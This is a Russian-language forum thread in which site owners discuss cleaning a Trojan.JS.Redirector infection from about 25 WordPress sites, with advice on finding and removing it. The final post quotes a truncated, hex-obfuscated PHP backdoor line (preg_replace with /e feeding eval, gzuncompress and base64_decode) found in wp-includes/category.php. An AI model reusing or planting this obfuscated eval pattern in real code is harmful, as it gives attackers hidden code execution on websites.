Для вступления в общество новичков и профессионалов домен-индустрии, пожалуйста нажмите здесь ...

   
 Купля-продажа и обсуждение доменных имён
        

  
Вернуться   Форум о доменах > Отдыхаем > Комната отдыха
Регистрация Реноме Правила форума Справка Сообщество
Комната отдыха В данной категории Вы можете вести речь на любые интересующие Вас темы до тех пор, пока цензура имеет место. Счетчик сообщений отключен.

Ответ
 
Опции темы
Сегодня
от 149р за .RU
Аренда сервера
2x Intel Hexa-Core Xeon E5-2420
Всего 79 евро!

с видеокартой GeForce GTX 1080 Ti
всего 99 евро!

от 149р за .РФ Реклама на DomenForum.net
Старый 15.02.2012, 00:59   #1
 
Аватар для superbiz
 
Регистрация: 21.09.2010
Адрес: Ex - Odessa, Now - Hamburg
Сообщений: 2,147
Доменные сделки: 43
Реноме: 2962
Одобрения
Спасибо (Отдано): 42
Спасибо (Получено): 48
Отправить сообщение для superbiz с помощью ICQ Отправить сообщение для superbiz с помощью Skype™
Восклицание Trojan.JS.Redirector.ue

кто сталкивался как лечить вордресс, около 25 сайтов на вордпресс шаватили ету гадость, определяут не все антивиры, каспер нашел при открытии, бросер начал матерится дня три назад, яндекс вебмастерс уже отметил у себя что сайты могут навредить компу, кто что слышал или пробовал?
Гуглил, ненашел
__________________
seamen.biz
superbiz вне форума   Ответить с цитированием
Старый 15.02.2012, 06:39   #2
 
Аватар для triangulum
 
Регистрация: 02.03.2008
Сообщений: 1,457
Доменные сделки: 25
Реноме: 1022
Одобрения
Спасибо (Отдано): 3
Спасибо (Получено): 8
а что никаких файлов нету на хосте?
triangulum вне форума   Ответить с цитированием
Старый 15.02.2012, 13:10   #3
 
Аватар для superbiz
 
Регистрация: 21.09.2010
Адрес: Ex - Odessa, Now - Hamburg
Сообщений: 2,147
Доменные сделки: 43
Реноме: 2962
Одобрения
Спасибо (Отдано): 42
Спасибо (Получено): 48
Отправить сообщение для superbiz с помощью ICQ Отправить сообщение для superbiz с помощью Skype™
Сообщение от triangulum Посмотреть сообщение
а что никаких файлов нету на хосте?
лишних файлов не нашел, потустороннего кода в пхпшках тоже вроде нет или ненашел, обсерфил вес инет, решения пока тоже нет. На форумах фрилансеров есть предложения убрать этого зверя от 50 до 250 уе за сайт. Мне дороговато выходит
__________________
seamen.biz
superbiz вне форума   Ответить с цитированием
Старый 15.02.2012, 18:47   #4
 
Аватар для triangulum
 
Регистрация: 02.03.2008
Сообщений: 1,457
Доменные сделки: 25
Реноме: 1022
Одобрения
Спасибо (Отдано): 3
Спасибо (Получено): 8
ну возможно комп ваш заражен....а если wordpress то полюбому есть где то лишний файл или в каком то файле код подправлен...других вариантов быть не может....надо все файлы везде проверить.... от wp-admin до wp-content, короче везде надо...
triangulum вне форума   Ответить с цитированием
Старый 15.02.2012, 19:16   #5
Почетный форумчанин
 
Аватар для Kiro
 
Регистрация: 11.01.2008
Адрес: Там, де нас нема
Сообщений: 4,597
Доменные сделки: 52
Реноме: 6548
Одобрения
Спасибо (Отдано): 6
Спасибо (Получено): 17
Отправить сообщение для Kiro с помощью ICQ Отправить сообщение для Kiro с помощью MSN
ищи зашифрованный код, если нет явного
Kiro вне форума   Ответить с цитированием
Старый 15.02.2012, 19:20   #6
Заблокирован
клон cyborg
 
Регистрация: 06.11.2010
Сообщений: 218
Доменные сделки: 2
Реноме: -276
Одобрения
Спасибо (Отдано): 1
Спасибо (Получено): 1
скачиваете на локальный комп содержимое хоста да программкой для сравнения (есть на даунлоадком) сравниваете файлики

чего проще?
hazehog вне форума   Ответить с цитированием
Старый 15.02.2012, 19:22   #7
Заблокирован
клон cyborg
 
Регистрация: 06.11.2010
Сообщений: 218
Доменные сделки: 2
Реноме: -276
Одобрения
Спасибо (Отдано): 1
Спасибо (Получено): 1
хотя может джаваскрипт вирус в текстах в базе данных
hazehog вне форума   Ответить с цитированием
Старый 15.02.2012, 19:29   #8
 
Аватар для AndyName
 
Регистрация: 25.03.2007
Сообщений: 936
Доменные сделки: 29
Реноме: 1502
Одобрения
Спасибо (Отдано): 0
Спасибо (Получено): 4
Сталкивался не с конкретно этим зверем, но с кем-то из его семейства JS троянов.

В общем смотрите файлы .js

В моём случае был зашифрованный текст в конце почти всех .js файлов и в темах оформления тоже. Причем так сразу и не заметишь, т.к. сильный отступ слева. Смотрите на нижний ползунок прокрутки.

Т.к. фигня поразила почти все .js файлы моего вордпресса, то я сделал следующее:
- сменил пароль на аккаунт хостинга
- сохранил папку ворпресса с контентом и конфиги
- снёс всё нафиг
- установил вордпресс заново
- проверил касперычем, что в сохранённой папке с контентом нету этого зверя
- заменил конфиг и папку с контентом на сохранённые

Проблема была решена.
AndyName вне форума   Ответить с цитированием
Старый 15.02.2012, 19:31   #9
 
Аватар для AndyName
 
Регистрация: 25.03.2007
Сообщений: 936
Доменные сделки: 29
Реноме: 1502
Одобрения
Спасибо (Отдано): 0
Спасибо (Получено): 4
Ах да... Базу данных не сносил, просто поменял пароль доступа к ней и обновил эту инфу в конфиге после всех действий, описанных выше.
AndyName вне форума   Ответить с цитированием
Старый 15.02.2012, 20:34   #10
 
Аватар для superbiz
 
Регистрация: 21.09.2010
Адрес: Ex - Odessa, Now - Hamburg
Сообщений: 2,147
Доменные сделки: 43
Реноме: 2962
Одобрения
Спасибо (Отдано): 42
Спасибо (Получено): 48
Отправить сообщение для superbiz с помощью ICQ Отправить сообщение для superbiz с помощью Skype™
на гофаке один умелец помог найти, может кому поможет , нашел мне на двух сайтах в wp-includes/category.php первой строчкой дрянь была, так что если у кого есть тоже посмотрите там - остальные пока ищу

code

PHP код:
preg_replace(" /.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x6 2\x61\x73\x65\x36\x3 4\x5F\x64\x65\x63\x6F\x64\x65\x28\x6 9\x6D\x70\x6C\x6F\x64\x65\x28 
__________________
seamen.biz
superbiz вне форума   Ответить с цитированием
Ответ



Реклама

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Текущее время: 02:28. Часовой пояс GMT +4.